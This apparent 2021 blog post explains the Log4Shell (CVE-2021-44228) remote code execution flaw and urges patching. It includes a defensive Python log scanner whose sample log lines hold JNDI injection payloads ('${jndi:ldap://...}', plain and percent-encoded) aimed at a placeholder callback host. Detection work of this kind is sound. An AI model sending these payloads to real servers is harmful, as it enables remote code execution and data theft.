Wednesday, December 15, 2021

Log4shell: Log4j zero-day vulnerability is a cybersecurity disaster!! and cyber criminals and hostile regimes are big winners 😟🤦‍♂️



The whole cybersecurity and InfoSec community has been talking about Log4Shell since the news broke last Friday. Log4j is an Apache product, a Java-based logging library that has been around for over 20 years. The vulnerability, CVE-2021-44228, lets a hacker send a request (for example an HTTP GET) to a vulnerable server with a ${} lookup expression inside it. When Log4j logs that message, it interprets the expression as a URL and contacts the hacker's server over the LDAP protocol. The answer can make the vulnerable server load and run executable code, which means the hacker gains remote code execution (RCE) and can then attack the server however he or she wishes.

Diagram showing Log4j / CVE-2021-44228 vulnerability (image credit: Juniper Threat Labs)  


If many companies did not use Log4j, this would be a minor issue. However, because Log4j has been around for so long, hundreds of thousands of companies that store millions of records of public data, including government websites and even Minecraft servers, are at risk. Another big problem is that older versions of Log4j exist on many older systems and cost millions to identify and repair.

It's clear that Log4Shell is one of the biggest disasters in cybersecurity, and criminals are already using it. The RCE exploit is reported to have been used for at least 9 days before the zero-day vulnerability became public, and ransomware attacks linked to Log4Shell have also begun to appear. Now is the time for cybercriminals and hostile government actors to steal citizens' data and try to exploit it in a criminal way. 😡😡
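Because the exploit was in use before it became public, it is worth checking existing web server logs for requests carrying a ${} lookup. The script below is an added example, not part of the original post: it assumes combined-format access logs, the function names are hypothetical, and the sample lines, IP addresses and host names are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). IPs and host names
# are documentation placeholders, not real indicators.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:09:14:05 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '198.51.100.23 - - [10/Dec/2021:09:14:09 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fb%7D HTTP/1.1" 200 128 "-" "curl/7.79.1"',
]

# Start of a ${...} lookup, up to the next whitespace or quote.
LOOKUP = re.compile(r'\$\{[^\s"]*')
# scheme://host embedded in the lookup (the server Log4j would be told to contact).
URL = re.compile(r'([a-z][a-z0-9+.-]*)://([^/\s":}]+)', re.IGNORECASE)


def decode(text, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %24%7B is seen as ${."""
    for _ in range(rounds):
        once = unquote(text)
        if once == text:
            break
        text = once
    return text


def scan(lines):
    """Return one finding per log line that carries a ${...} lookup expression."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        match = LOOKUP.search(decode(raw))
        if not match:
            continue
        expr = match.group(0)
        url = URL.search(expr)
        findings.append({
            "line": number,
            "client": raw.split(" ", 1)[0],   # first field is the client address
            "expression": expr,
            "scheme": url.group(1).lower() if url else None,
            "callback_host": url.group(2) if url else None,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows that a lookup string reached the server's logs, not that the server was compromised; whether it was depends on the Log4j version that processed the request. The callback hosts it reports are useful for searching outbound connection logs.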

Please, friends, update your Log4j packages to the patched version, and keep lobbying the companies that store your data to make sure they do their best to keep it safe. 🙏🙏
